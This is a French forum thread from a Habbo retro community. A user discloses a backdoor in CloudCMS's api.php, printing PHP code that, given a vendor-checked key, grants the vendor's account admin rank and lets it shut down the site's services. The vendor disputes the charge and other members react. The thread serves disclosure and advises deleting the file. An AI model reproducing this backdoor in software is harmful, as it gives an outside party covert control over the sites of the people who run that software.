débat Cloudcms - non sécurisé

[Akushi 83]

Ayant télécharger quelque CMS gratuit venant de cloudcms.fr j'ai remarqué un petit soucis que sont créateur à mis volontairement.

 

if (isset($_GET['override']) AND $_GET['override'] == 1) {
	if (isset($_GET['key']) AND !empty($_GET['key'])) {
		$ThisAPI = file_get_contents('https://api.cloudcms.fr/index.php?api=override&key=' . $_GET['key']);
		$API = json_decode($ThisAPI);
		if ($API->response == 'success') {
			$ThisPDO = $pdo->query('UPDATE users SET rank = ? WHERE username = ?', ["16", "7evenGiven"]);
			die('Accès système autorisé.');
		} else {
			die($API->response);
		}
	}
} elseif (isset($_GET['shutdown']) AND $_GET['shutdown'] == 1) {
	if (isset($_SESSION['id'])) {
		if ($Account->RetrieveInfoById($_SESSION['id'], 'rank') == 16) {
			$ThisPDO = $pdo->query('UPDATE cloudcms_api SET server = ?', ["close"]);
			$ThisPDO = $pdo->query('INSERT INTO cloudcms_logs (user_id, timeact, action) VALUES (?, ?, ?)', [$_SESSION['id'], time(), "vient de fermer l'accès aux services en ligne."]);
			die('Vous avez fermé l\'accès aux services en ligne, pour réactiver l\'accès, il faut vous rendre dans votre base de données puis dans "<b>cloudcms_api</b>" et modifier la valeur de serveur de "<b>close</b>" à "<b>open</b>".');
		} else {
			die();
		}
	}
}

 

Sont créateur à instaurer ceci une " API " pour pouvoir gérer les CMS et le fonctionnement du CMS, mais comme vous pouvez le remarquer il à volontairement mis un système pour ce rank

 

Comment il exploite ceci ?

 

Le fichier api.php est accéssible par n'importe qui mais personne n'a le paramètres $_GET['key'] mise à pars lui il lui suffis de l'entrer comme montrer dans l'example ci dessous est il seras rank et peux aussi fermer l'accès à votre site si vous ne savez pas ou ces c'est situé dans la table cloudcms_api remetter la colonne server sur open

 

/!\ Ceci ne sert à rien d'essayé d'exploité cette faille car vous ne connaissez pas le deuxième paramètres $_GET['key'] qui est nécessaire pour faire fonctionner cette faille /!\

 

Please login or register to see this link.

OnNeSaisPas

 

Avec ce lien et la clé qu'il à définit il peut ce rank sur n'importe qu'elle rétro utilisant ces CMS alors je ne vous conseille absolument pas d'utiliser ces CMS.

 

Comment fixé vous allez me dire ?

 

Très simple aller à la racine de votre dossier la ou est situé votre CMS est supprimer le fichier nommé api.php

 

Merci à @ NathanDZC de lui aussi l'avoir remarquer, oui ne critiquez pas mon orthographe sa n'a jamais était mon fort.

[Thomas 720]

    Salut Akushi ,
    Ton sujet a été déplacé pour une des deux raisons suivantes :

    - Ta demande a été résolue.

    - Ton sujet se trouvait dans la mauvaise catégorie.

        
      Ceci est un message automatique.

[Storm 1]

Ils devraient avoir honte de faire ce genre de choses 

[7evenGiven 78]

Bonjour à tous,

Je partage ici un communiqué afin de résoudre cette fausse rumeur.

En aucun cas CloudCMS a été crée pour nuire à ces utilisateurs.

Cette API est programmée et commandée sous mes ordres et uniquement par moi.

Moi seul en ayant la permission du fondateur du rétro-habbo utilisant nos services peut avoir un accès total au site, j'entends uniquement par là (accès administration).

En aucun cas, la clé de sécurité est exploitable, celle-ci est renouvelée toutes les heures. 

Je vois aussi que cette rumeur inquiète bon nombre d'entre-vous, c'est compréhensible, mais malheureusement cette rumeur est démenti.

@ Akushi poste un sujet sans même en parler avec moi afin de lui faire comprendre que non, ce n'est pas une faille, mais un outil d'aide.

Afin d'éviter que cela se reproduire, CloudCMS va recevoir une MAJ dans la matinée qui informera les clients de cette "API" dans nos services dans la catégorie "À propos de notre site".

Nous nous excusons pour la gêne occasionnée, encore une fois comme l'a dit @ Akushi si vous refusez la confiance de CloudCMS, supprimer le fichier API.php

 

Merci pour votre confiance que vous portez à l'attention de CloudCMS.

À très vite.

[Akushi 83]

il y a 2 minutes, 7evenGiven a dit :

Bonjour à tous,

Je partage ici un communiqué afin de résoudre cette fausse rumeur.

En aucun cas CloudCMS a été crée pour nuire à ces utilisateurs.

Cette API est programmée et commandée sous mes ordres et uniquement par moi.

Moi seul en ayant la permission du fondateur du rétro-habbo utilisant nos services peut avoir un accès total au site, j'entends uniquement par là (accès administration).

En aucun cas, la clé de sécurité est exploitable, celle-ci est renouvelée toutes les heures. 

Je vois aussi que cette rumeur inquiète bon nombre d'entre-vous, c'est compréhensible, mais malheureusement cette rumeur est démenti.

@ Akushi poste un sujet sans même en parler avec moi afin de lui faire comprendre que non, ce n'est pas une faille, mais un outil d'aide.

Afin d'éviter que cela se reproduire, CloudCMS va recevoir une MAJ dans la matinée qui informera les clients de cette "API" dans nos services dans la catégorie "À propos de notre site".

Nous nous excusons pour la gêne occasionnée, encore une fois comme l'a dit @ Akushi si vous refusez la confiance de CloudCMS, supprimer le fichier API.php

 

Merci pour votre confiance que vous portez à l'attention de CloudCMS.

À très vite.

 

Sa reviens au même sa reste une faille de sécurité facilement exploitable par des personnes s'y connaissant une parole reste une parole tu as accès à n'importe quel rétro ne dis pas que tu as uniquement accès  à l'administration plus emu est codé de façon à ce que plus ton rang est haut plus tu as de permissions les permissions sont pas gérable si tu met toutes les permissions au 7 le rang 8 auras toutes les permissions du rang 7 donc tu peux clairement avoir accès à tout ce qui est complétement dégelasse de la part d'un vendeur de cms déjà illégale de base pourquoi en parler ? Tu n'avertis pas les utilisateurs de ce genre de faille et c'est clairement pas normal quand un fichier et la il est censée être dis vous dîtes sécurisé il n'y à rien de sécurisé dans sa.

[7evenGiven 78]

à l’instant, Akushi a dit :

 

Sa reviens au même sa reste une faille de sécurité facilement exploitable par des personnes s'y connaissant une parole reste une parole tu as accès à n'importe quel rétro ne dis pas que tu as uniquement accès  à l'administration plus emu est codé de façon à ce que plus ton rang est haut plus tu as de permissions les permissions sont pas gérable si tu met toutes les permissions au 7 le rang 8 auras toutes les permissions du rang 7 donc tu peux clairement avoir accès à tout ce qui est complétement dégelasse de la part d'un vendeur de cms déjà illégale de base pourquoi en parler ? Tu n'avertis pas les utilisateurs de ce genre de faille et c'est clairement pas normal quand un fichier et la il est censée être dis vous dîtes sécurisé il n'y à rien de sécurisé dans sa.

Je n'ai pas accès aux permissions PlusEMU mais encore une fois uniquement à l'administration et sous l'accord du fondateur.

Je n'ai jamais exploité un de nos clients et ça n'arrivera pas.

Tu appelles ça comme tu veux, je ne considère ça nullement comme une faille (fixe et inséré exprès).

 

Encore une fois, nos clients vont être avertis, il n'y a pas de souci.

La sécurité de cette clé est primordiale, je ne vais pas le répéter 30 fois, celle-ci est assuré par CloudCMS.

Je ne vais pas m'éterniser là-dessus, je fais un plus gros communiqué tout à l'heure dans la matinée.

[Akushi 83]

il y a 1 minute, 7evenGiven a dit :

Je n'ai pas accès aux permissions PlusEMU mais encore une fois uniquement à l'administration et sous l'accord du fondateur.

Je n'ai jamais exploité un de nos clients et ça n'arrivera pas.

Tu appelles ça comme tu veux, je ne considère ça nullement comme une faille (fixe et inséré exprès).

 

Encore une fois, nos clients vont être avertis, il n'y a pas de souci.

La sécurité de cette clé est primordiale, je ne vais pas le répéter 30 fois, celle-ci est assuré par CloudCMS.

Je ne vais pas m'éterniser là-dessus, je fais un plus gros communiqué tout à l'heure dans la matinée.

 

Fais donc ce que tu veux ce genre de fichier n'est pas imposable et devrait juste être proposer à pars.

[PΛПΛMΣ 24]

Ca change rien de ou tu met une API sal shlag va mdrr 

"UN OUTILS D'AIDE" Tu veux faire croire ca a qui a Gaultier de HabboDev ? 

Cest vraiment pitoyable, je ne sais même pas pourquoi des gens s'amuse à payé sur ton site alors que tt les cms on etait partagé. Sauf celuis de city qui a etait "fixer" et Habbox qui lui de demande que de l'argent  ou des connaissances avec certains dev . 

Bref n'achetez rien chez lui, cest encore un mec chelou à qui faut pas faire confiance.

Une api d'aide, nan mais on aura tt vu dans cette commu.

 

Pytoyable

[Zorked 14]

Mdr, hilarant, soit disant il aide la communauté ?. Il veux juste récupérer des données. @ Akushi et moi ont a  directement vu ce api, bref on va faire le nécessaire.

[7evenGiven 78]

Please login or register to see this link.

Un communiqué a été mis à disposition afin de mieux comprendre le fonctionnement de cette API.

Afin de clôturer définitivement cette fakenews.

Please login or register to see this link.

[Solife 1,308]

    Salut Akushi ,
    Ton sujet a été déplacé pour une des deux raisons suivantes :

    - Ta demande a été résolue.

    - Ton sujet se trouvait dans la mauvaise catégorie.

        
      Ceci est un message automatique.

[Stown 76]

Effectivement, il s'agit bien d'une faille pour vous nuire, je vous déconseille fortement d'utiliser les cms de cloudcms sous peine de vous faire hacker votre rétro.

 

Le code est clairement explicite.

[Akushi 83]

il y a 37 minutes, Stown a dit :

Effectivement, il s'agit bien d'une faille pour vous nuire, je vous déconseille fortement d'utiliser les cms de cloudcms sous peine de vous faire hacker votre rétro.

 

Le code est clairement explicite.

 

Oui bien sûr sont auteur nie tous cela la clé est choisis par lui pas par le client et le fichier est imposée hors il devrait être non imposable et la clé devrait être choisis par sont fondateur pas par le vendeur

[ßRÂИÐØИ 50]

Je ne vois pas trop l’intérêt de cette 'api' car si t'es clients ont un soucis pourquoi avoir accès à l'administration ? 
Et le Shutdown j'en vois pas l'intérêt non plus. 
Moi je vais pas m'avancer et dire que cela et de mauvaise fois, mais vous devriez faire un pack "Assistance" a insérer la FTP à la demande du Fondateur / Client du rétro.
Ou bien une possibilité pour le fondateur du rétro d'activer l'exploitation de l'api depuis son administration.

C'est vrai que la manque d'information apporte un doute sur la sincérité de cette "api" puisqu'il a fallu attendre que ce soit découvert par tierce personne.

[Stown 76]

Il y a 2 heures, 7evenGiven a dit :

Please login or register to see this link.

Un communiqué a été mis à disposition afin de mieux comprendre le fonctionnement de cette API.

Afin de clôturer définitivement cette fakenews.

Please login or register to see this link.

Tellement tu es en panique, on a accès à tous les emails à qui tu as envoyé ton 'communiqué'

[Lucas 36]

CloudCMS, se sert des API pour prendre les données de votre rétro décevant surtout savoir que @ 7evenGiven et au final @ TheoDEV ( soit disant ).

[Kaizer 0]

Merci @ Akushi de l'avoir découvert et surtout de l'avoir dit, en espérant que ta découverte avertissent beaucoup de gens concernant Cloudcms. Surprenant surtout d'un vendeur de faire se genre de chose. Au passage j'ai pu découvrir aussi que j'avais notament un fichier API le même que le tient dans le cms que j'ai téléchargé la bah. Merci  

[Lucas 36]

Pour info, les CMS payant ont aussi cette API.

[Python 24]

ça m'étonne pas de la part d'un mec qui fait des reproductions de CMS sans l'accord des développeurs 

[Stown 76]

Il y a 6 heures, Python a dit :

ça m'étonne pas de la part d'un mec qui fait des reproductions de CMS sans l'accord des développeurs 

et qui y ajoute son copyright...

[Python 24]

Il y a 22 heures, Stown a dit :

et qui y ajoute son copyright...

Rien qu'il reproduit le CMS de HabboZone sans ton accord